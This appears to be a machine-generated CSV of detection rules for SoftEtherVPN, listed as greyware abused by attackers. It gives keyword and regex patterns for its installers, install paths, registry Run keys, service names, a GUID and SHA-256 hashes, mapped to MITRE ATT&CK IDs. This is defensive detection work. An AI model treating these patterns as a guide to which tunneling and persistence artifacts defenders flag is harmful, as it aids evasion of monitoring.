"*/SoftEtherVPN.git*",".{0,1000}\/SoftEtherVPN\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","abused https://asec.ahnlab.com/en/66843/","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/SoftEtherVPN/releases/tag/*",".{0,1000}\/SoftEtherVPN\/releases\/tag\/.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/softether-vpnclient-*.exe*",".{0,1000}\/softether\-vpnclient\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/softether-vpnserver-*.deb*",".{0,1000}\/softether\-vpnserver\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/softether-vpnserver.service*",".{0,1000}\/softether\-vpnserver\.service.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/softether-vpnserver_*.exe*",".{0,1000}\/softether\-vpnserver_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*/usr/ports/security/softether5*",".{0,1000}\/usr\/ports\/security\/softether5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\AppData\Local\Temp\VPN_*\VPN_Lock.dat*",".{0,1000}\\AppData\\Local\\Temp\\VPN_.{0,1000}\\VPN_Lock\.dat.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\appdata\local\temp\vpn_*\vpnsetup.exe*",".{0,1000}\\appdata\\local\\temp\\vpn_.{0,1000}\\vpnsetup\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\AppData\Local\Temp\VPN_AECD\*",".{0,1000}\\AppData\\Local\\Temp\\VPN_AECD\\.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\CurrentControlSet\Services\Neo_VPN*",".{0,1000}\\CurrentControlSet\\Services\\Neo_VPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\CurrentControlSet\Services\SEVPNCLIENTDEV*",".{0,1000}\\CurrentControlSet\\Services\\SEVPNCLIENTDEV.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\DriverDatabase\DeviceIds\NeoAdapter_VPN*",".{0,1000}\\DriverDatabase\\DeviceIds\\NeoAdapter_VPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\Program Files (x86)\SoftEther VPN*",".{0,1000}\\Program\sFiles\s\(x86\)\\SoftEther\sVPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\Program Files\SoftEther VPN*",".{0,1000}\\Program\sFiles\\SoftEther\sVPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\Public\Desktop\SoftEther VPN *",".{0,1000}\\Public\\Desktop\\SoftEther\sVPN\s.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\SoftEther VPN *\client_log\client_20*.log*",".{0,1000}\\SoftEther\sVPN\s.{0,1000}\\client_log\\client_20.{0,1000}\.log.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\SoftEther VPN Client Developer Edition\*",".{0,1000}\\SoftEther\sVPN\sClient\sDeveloper\sEdition\\.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\SoftEtherVPN-*.tar.xz*",".{0,1000}\\SoftEtherVPN\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\SoftEtherVPN_build-*.zip*",".{0,1000}\\SoftEtherVPN_build\-.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\softether-vpnclient-*.exe*",".{0,1000}\\softether\-vpnclient\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\softether-vpnserver_*.exe*",".{0,1000}\\softether\-vpnserver_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\softether-vpnserver_vpnbridge-*.exe*",".{0,1000}\\softether\-vpnserver_vpnbridge\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoftEther VPN*",".{0,1000}\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SoftEther\sVPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\Start Menu\Programs\StartUp\SoftEther VPN Client*",".{0,1000}\\Start\sMenu\\Programs\\StartUp\\SoftEther\sVPN\sClient.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\Uninstall\softether_sedevvpnclient*",".{0,1000}\\Uninstall\\softether_sedevvpnclient.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*\vpncmgr.exe*",".{0,1000}\\vpncmgr\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*<SoftEther VPN Project at University of Tsukuba, Japan.>*",".{0,1000}\<SoftEther\sVPN\sProject\sat\sUniversity\sof\sTsukuba,\sJapan\.\>.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#companyname","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*>SoftEther VPN Setup (Developer Edition)<*",".{0,1000}\>SoftEther\sVPN\sSetup\s\(Developer\sEdition\)\<.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*>SoftEther VPN Setup<*",".{0,1000}\>SoftEther\sVPN\sSetup\<.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*00B41CF0-7AE9-4542-9970-77B312412535*",".{0,1000}00B41CF0\-7AE9\-4542\-9970\-77B312412535.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#GUIDproject","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*096311de816ac0a5c886680f6e60f99ad60df58773f2dbece09fb35e48b5702c*",".{0,1000}096311de816ac0a5c886680f6e60f99ad60df58773f2dbece09fb35e48b5702c.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*09b5f413ec7c75c4ad05a832f70512725f706be190b77a04bf459ba46bf4fb1a*",".{0,1000}09b5f413ec7c75c4ad05a832f70512725f706be190b77a04bf459ba46bf4fb1a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*0e6ac7f5a2adec8973bcb337c1f12f28931b76f3e3d45b14d63acf1e3bf07a31*",".{0,1000}0e6ac7f5a2adec8973bcb337c1f12f28931b76f3e3d45b14d63acf1e3bf07a31.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*115426ae1c906030d369a2d7f37ccdbc059869f709add60b6a8177a8100e7b61*",".{0,1000}115426ae1c906030d369a2d7f37ccdbc059869f709add60b6a8177a8100e7b61.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*121559209213c1de5bccd241092888985985c6992122e59d1ef053b89d5b9c99*",".{0,1000}121559209213c1de5bccd241092888985985c6992122e59d1ef053b89d5b9c99.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*18c7944f13fe80a024cb1fdce6a2621dcd2ab11f639773d42902aec34085b51e*",".{0,1000}18c7944f13fe80a024cb1fdce6a2621dcd2ab11f639773d42902aec34085b51e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*19ee368d7680478dc89a246dbf3e57a05242a239a68d40ec6529208425fbf485*",".{0,1000}19ee368d7680478dc89a246dbf3e57a05242a239a68d40ec6529208425fbf485.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*1b14c2ba7ba16b131c65a8e61bddef8db25bec2d641ff138b9a84a522581aff7*",".{0,1000}1b14c2ba7ba16b131c65a8e61bddef8db25bec2d641ff138b9a84a522581aff7.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*20562bf31696728f41152473ae781c24d7a6809ad34c57fc4f8219ddc0d98f47*",".{0,1000}20562bf31696728f41152473ae781c24d7a6809ad34c57fc4f8219ddc0d98f47.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*2222ef48b3f9102265ef7d27e496ad40a1bd1eaba8093bc5e696b48402c52441*",".{0,1000}2222ef48b3f9102265ef7d27e496ad40a1bd1eaba8093bc5e696b48402c52441.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*27d9a04aeaab3a37b0de7e3976fd928695c3e2488e7b6b8be5d95e8fa1dd8f4a*",".{0,1000}27d9a04aeaab3a37b0de7e3976fd928695c3e2488e7b6b8be5d95e8fa1dd8f4a.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*284fb65de7d9c928ca978cebd863136e79c618d65b357d3da9faeed6008783cb*",".{0,1000}284fb65de7d9c928ca978cebd863136e79c618d65b357d3da9faeed6008783cb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*2a0542f8d159539b07faeb5849be99d1c62e1c16d236178fdc13eb2ebb7b262e*",".{0,1000}2a0542f8d159539b07faeb5849be99d1c62e1c16d236178fdc13eb2ebb7b262e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*2a7896d5bad2028fec904ac21e4355e0446ad5c9036bd1c3b8b2e93e0646bd6e*",".{0,1000}2a7896d5bad2028fec904ac21e4355e0446ad5c9036bd1c3b8b2e93e0646bd6e.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*2acb885af8fce92b0cca89d8e2b82d954a85f8ce0751a27258a3c4cdd2f8ef88*",".{0,1000}2acb885af8fce92b0cca89d8e2b82d954a85f8ce0751a27258a3c4cdd2f8ef88.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*34b8d45bfea0d60f3b897a8c36276bdfeb7e9b00f0ee673d43f4555baf9eb8b4*",".{0,1000}34b8d45bfea0d60f3b897a8c36276bdfeb7e9b00f0ee673d43f4555baf9eb8b4.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*381bca8edcf6cb2302baccebc9daada145989116aace489ba3d9072a57a853ed*",".{0,1000}381bca8edcf6cb2302baccebc9daada145989116aace489ba3d9072a57a853ed.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*38b4843755a0ceca33637b4a1bc052b4c379b666e512511c4629ca6a65468bd3*",".{0,1000}38b4843755a0ceca33637b4a1bc052b4c379b666e512511c4629ca6a65468bd3.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*3bef28a58c4ee75b3b4ac0a6025f1c0332bb1d9f27d066082fa2e32416da4eac*",".{0,1000}3bef28a58c4ee75b3b4ac0a6025f1c0332bb1d9f27d066082fa2e32416da4eac.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*3d3deaf15f2bf36dc998286809ee0fa327cb526bd5a93026d8124af3b8d8182b*",".{0,1000}3d3deaf15f2bf36dc998286809ee0fa327cb526bd5a93026d8124af3b8d8182b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*43d3a9e3e07ebacf08278a47845b29b0c29daac00ae1d6ca7756f47de4a67b7b*",".{0,1000}43d3a9e3e07ebacf08278a47845b29b0c29daac00ae1d6ca7756f47de4a67b7b.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*447d9a15567f0eb81871ddbdc2de28bd2e339b892548bab25a9f58afbbc177a7*",".{0,1000}447d9a15567f0eb81871ddbdc2de28bd2e339b892548bab25a9f58afbbc177a7.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
"*4876b52e363af1705a6c5ccc1c6be930dd47226f4b2835ec827bf8e4de33c40f*",".{0,1000}4876b52e363af1705a6c5ccc1c6be930dd47226f4b2835ec827bf8e4de33c40f.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","#filehash","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z"
